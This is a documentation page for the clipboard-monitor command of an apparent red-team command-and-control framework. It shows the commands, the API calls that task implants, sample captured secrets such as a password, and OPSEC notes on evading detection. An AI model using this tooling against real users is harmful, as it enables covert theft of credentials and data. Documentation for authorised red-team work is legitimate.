Skip to content

Clipboard Monitor

Capture and monitor the Windows clipboard. Supports one-shot reads and continuous change monitoring with configurable poll intervals.

MITRE ATT&CK

Clipboard monitoring maps to T1115 - Clipboard Data.

Commands

Command Syntax Description
clipboard clipboard One-shot read of current clipboard contents
clipboard start clipboard start [interval_ms] Start continuous clipboard monitoring
clipboard stop clipboard stop Stop continuous monitoring

One-Shot Read

clipboard

Read the current clipboard contents (text only, CF_UNICODETEXT format). Returns the current text or "(clipboard empty or not text)" if the clipboard contains non-text data.

Shell syntax:

clipboard

API example:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "clipboard"}'

CNA scripting:

bclipboard($bid);

Continuous Monitoring

clipboard start [interval_ms]

Start a background clipboard monitor that polls for changes at a configurable interval. When new text is detected, it is timestamped and appended to an output file in %TEMP%.

Parameter Type Required Default Description
interval_ms int No 1000 Poll interval in milliseconds

Shell syntax:

clipboard start
clipboard start 500

API example:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "clipboard start 500"}'

Example output:

Clipboard monitor started, interval=500ms, output=C:\Users\labuser\AppData\Local\Temp\clipboard_20260219_143022.txt

The output file contains timestamped entries only when the clipboard content changes:

--- Clipboard monitor started at 2026-02-19T14:30:22Z ---
[2026-02-19T14:30:23Z] Password123!
[2026-02-19T14:31:45Z] \\DC01\SYSVOL\corp.local
[2026-02-19T14:32:10Z] SELECT * FROM users WHERE admin=1
--- Clipboard monitor stopped at 2026-02-19T14:35:00Z ---

clipboard stop

Stop the background clipboard monitor.

Shell syntax:

clipboard stop

How It Works

  1. One-shot (get): Opens the clipboard via OpenClipboard(), reads text with GetClipboardData(CF_UNICODETEXT), converts UTF-16 to Go string using GlobalLock/GlobalUnlock, and closes the clipboard
  2. Continuous (start): Spawns a goroutine that polls the clipboard at the configured interval. Only records entries when the content changes (change detection). Writes timestamped entries to an output file in %TEMP%
  3. Stop: Closes the stop channel, terminating the polling goroutine. The output file is finalized with an end timestamp

OPSEC Considerations

  • Calls OpenClipboard / GetClipboardData from user32.dll -- these API calls from unusual processes may be flagged
  • Continuous monitoring creates a file on disk in %TEMP% with clipboard contents
  • No new process creation -- all clipboard access happens inline in the beacon process
  • Change detection avoids excessive writes (only logs when content differs from last poll)
  • MITRE ATT&CK: T1115 (Clipboard Data)